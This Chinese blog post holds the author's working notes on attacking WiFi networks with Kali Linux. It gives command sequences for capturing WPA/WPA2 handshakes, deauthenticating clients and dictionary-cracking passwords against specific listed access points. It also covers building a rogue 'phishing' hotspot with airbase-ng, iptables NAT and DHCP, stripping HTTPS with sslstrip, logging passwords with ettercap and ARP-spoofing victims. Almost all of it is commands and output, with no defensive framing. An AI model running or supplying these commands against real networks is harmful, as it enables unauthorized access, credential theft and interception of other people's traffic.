Chinaunix首页 | 论坛 | 博客
  • 博客访问: 6660427
  • 博文数量: 1159
  • 博客积分: 12444
  • 博客等级: 上将
  • 技术积分: 12570
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-13 21:34
文章分类

全部博文(1159)

文章存档

2016年(126)

2015年(350)

2014年(56)

2013年(91)

2012年(182)

2011年(193)

2010年(138)

2009年(23)

分类: 网络与安全

2015-09-08 23:29:04


kali---aircrack-ng破解wifi密码

1.下载安装aircrack-ng
    a.直接从源中安装
        apt-get install aircrack-ng
    b.下载编译安装
        下载aircrack-ng-1.1.tar.gz()
        解压缩,进入解压缩后的目录,对Makefile进行make,然后使用make Makefile install进行安装
        可能需要安装openssl才能够正常编译。
        可以使用命令
        apt-get install libssl-dev
        来安装openssl

2.启动无线,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。这时还可以获得本机的mac地址。


3.寻找要破解的网络,开启破解。开启终端1.
    a.使用命令
      iwlist wlan0 scanning

      有的无线在最后终止监控wlan0mon后再使用这个命令会没有用,这是需要重启这个无线网卡。本次测试中所使用的无线就会出现这种情况。

      然后找到所选的网络,获得其mac地址,通道,essid等信息
      使用命令
      airmon-ng start wlan0
      开启一个监控


4.开启终端1

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

    b.使用命令
      airmon-ng start wlan0

      airodump-ng wlan0mon

airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607
airodump-ng wlan0mon --essid 606-ztg
airodump-ng wlan0 --essid 606-ztg

airodump-ng -w longas wlan0mon --essid aidajingjing

      这时会看到无线的地址出现在屏幕上。



      屏幕上会显示出它们的mac地址以及所在频道。
      选择所需的无线,记录其所在的频道以及mac地址。


4.开启终端2
    使用命令

    airodump-ng -c 频道 --bssid 目标主机的mac -w name wlan0mon

airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w name wlan0mon
airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon

00:23:6C:97:21:89
00:26:C7:72:B2:3C
F0:27:65:6B:09:97
A8:A6:68:1A:D8:1D

    这里的name为存包文件的名字,可以更改。



5.开启终端3
    使用命令

    aireplay-ng -1 0 -a 目标的mac -h 本机的mac wlan0mon

aireplay-ng -1 0 -a C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

    这时会有成功字样显示。如果没有显示可能就是目标不支持或者系统部稳定,需要更换目标了。
    显示成功后进行下步。

    继续输入命令
    aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标的mac -h 本机的mac wlan0mon

aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

    此时终端2中的数据会增长很快,当数据到达5000的时候就可以破解了。

root@debian:~# aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon



7.开启终端4
    使用命令longas
aircrack-ng name*.cap

aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap

    name为自己索取的名字

    这时就开始破解了,如果你进行过多组,可能会有多组结果,你可以用数字123进行选择。
    如果没有破解出来,程序会自动等待到再有5000个数据时重新破解。
    如果不出意外,最终你能够破解出来这组无线的密码。


8.最后
    在一个终端中输入命令
    airmon-ng stop wlan0mon

    结束监控过程
    (airomon-ng check可以查看你开启了多少监控,如果运行多组的时候可以查看后选择关闭)

++++++++++++++++++++++++++ 使用Aircrack-ng破解WPA/WPA2-PSK加密无线网络 ++++++++++++++++++++++++++++++++++
 CH  1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53                                         
                                                                  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 C8:3A:35:14:AB:18   -3      748      154    0  10  54e  WPA  CCMP   PSK  606-ztg
                                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 C8:3A:35:14:AB:18  C8:AA:21:DF:0D:6D  -25    1e- 1e     0      156




开启终端1
ifconfig -a
airmon-ng start wlan0
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

airodump-ng -w name wlan0mon
airodump-ng -w name wlan0mon --essid 606-ztg

开启终端2
airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon

开启终端3
aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon

开启终端4
aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst log*.cap


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill block 2
rfkill unblock 2

airmon-ng start wlan0
airmon-ng stop wlan0


airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607

airodump-ng -w longas wlan0mon --essid aidajingjing


+++++++++++++++++++++++ 7.5  实例——Kali Linux中创建钓鱼WiFi热点 +++++++++++++++++++++++++++++++++++++

ifconfig -a
airmon-ng start wlan0          #激活网卡至监听模式
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2
airbase-ng -c 12 -e ztg wlan0mon


root@debian:~# iw wlan0mon del
root@debian:~# iw wlan0 del
root@debian:~# iw phy phy0 interface add wlan0 type monitor


+++++++++++++++++++++++ 利用Kali进行WiFi钓鱼测试实战 +++++++++++++++++++++++++++++++++++++
/>
route -n -A inet | grep UG

0.0.0.0         10.108.160.1    0.0.0.0         UG    1024   0        0 eth0
10.3.9.31       10.108.160.1    255.255.255.255 UGH   1      0        0 eth0

gatewayip = 10.108.160.1
internet_interface = eth0
fakeap_interface = wlan0
ESSID = aaaa


-------终端窗口1

ifconfig -a

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

SIOCSIFFLAGS: Operation not possible due to RF-kill

rfkill list

0: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
1: tpacpi_bluetooth_sw: Bluetooth
    Soft blocked: no
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no

rfkill unblock 1
ifconfig wlan0 up
airmon-ng start wlan0
root@debian:~# airbase-ng -e ztg wlan0


airbase-ng wlan0 -e ztg -c 10




airbase-ng wlan0mon -e ztg -c 10

iw wlan0 del; iw wlan0mon del; iw phy phy0 interface add wlan0 type monitor;

iw wlan0 del; iw phy phy0 interface add wlan0 type monitor; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airmon-ng start wlan0; airbase-ng wlan0 -e ztg -c 10

ifconfig wlan0 down; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airbase-ng wlan0 -e ztg -c 10
-------

//airmon-ng start wlan0
//airbase-ng -c 12 -e ztg wlan0


-------终端窗口2
root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; ifconfig at0 mtu 1420; ifconfig wlan0 mtu 1460; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

-------

# Tables

ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1420
ifconfig wlan0 mtu 1460
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -Z
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE

//iptables -A FORWARD -i eth0 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
//iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
//iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source 10.108.160.1
//iptables -t nat -A PREROUTING -i at0 -j DNAT --to-source 10.108.160.1


-------终端窗口3
root@debian:~# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
-------

# DHCP

#dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server restart
/etc/init.d/isc-dhcp-server start
/etc/init.d/isc-dhcp-server stop


dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0; /etc/init.d/isc-dhcp-server restart;


-------终端窗口4
root@debian:~# driftnet -i at0
-------


-------终端窗口4
root@debian:~# sslstrip -f -p -k 10000
-------

-------终端窗口5
root@debian:~# ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0
-------

-------终端窗口6
root@debian:~# mkdir -p "/pentest/wireless/airssl/driftnetdata"
root@debian:~# driftnet -i eth0 -p -d /pentest/wireless/airssl/driftnetdata
-------



export PATH=$PATH:/mnt/opt/android-on-linux/android-sdk-linux/platform-tools/



iwconfig wlan0 txpower 15
iw dev wlan0 set txpower fixed 30

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 192.168.1.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
iw phy0 info
iw wlan0 info

root@debian:~# cat /etc/NetworkManager/system-connections/

++++++++++++++设置发射功率
iw list
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30
ifconfig wlan0 up

+++++++++++++++++++

ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -M arp:remote //192.168.0.1/ //192.168.1.101/

++++++++++++++++++

oot@debian:~# lspci -tv
-[0000:00]-+-00.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller
           +-01.0-[01]----00.0  NVIDIA Corporation GF117M [GeForce 610M/710M/820M / GT 620M/625M/630M/720M]
           +-02.0  Intel Corporation 4th Gen Core Processor Integrated Graphics Controller
           +-03.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller
           +-14.0  Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI
           +-16.0  Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1
           +-1a.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #2
           +-1b.0  Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller
           +-1c.0-[02-06]--
           +-1c.1-[07]----00.0  Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
           +-1c.2-[08-0c]--
           +-1c.3-[0d]----00.0  Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
           +-1c.4-[0e-12]----00.0  Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader
           +-1d.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1
           +-1f.0  Intel Corporation HM86 Express LPC Controller
           +-1f.2  Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode]
           \-1f.3  Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller
root@debian:~#

root@debian:~# lspci -vnn
07:00.0 Network controller [0280]: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter [10ec:b723]
    Subsystem: Lenovo Device [17aa:b728]
    Flags: bus master, fast devsel, latency 0, IRQ 17
    I/O ports at 6000 [size=256]
    Memory at f5d00000 (64-bit, non-prefetchable) [size=16K]
    Capabilities: [40] Power Management version 3
    Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
    Capabilities: [70] Express Endpoint, MSI 00
    Capabilities: [100] Advanced Error Reporting
    Capabilities: [140] Device Serial Number 00-23-b7-fe-ff-4c-e0-00
    Capabilities: [150] Latency Tolerance Reporting
    Capabilities: [158] L1 PM Substates
    Kernel driver in use: rtl8723be













阅读(1139) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~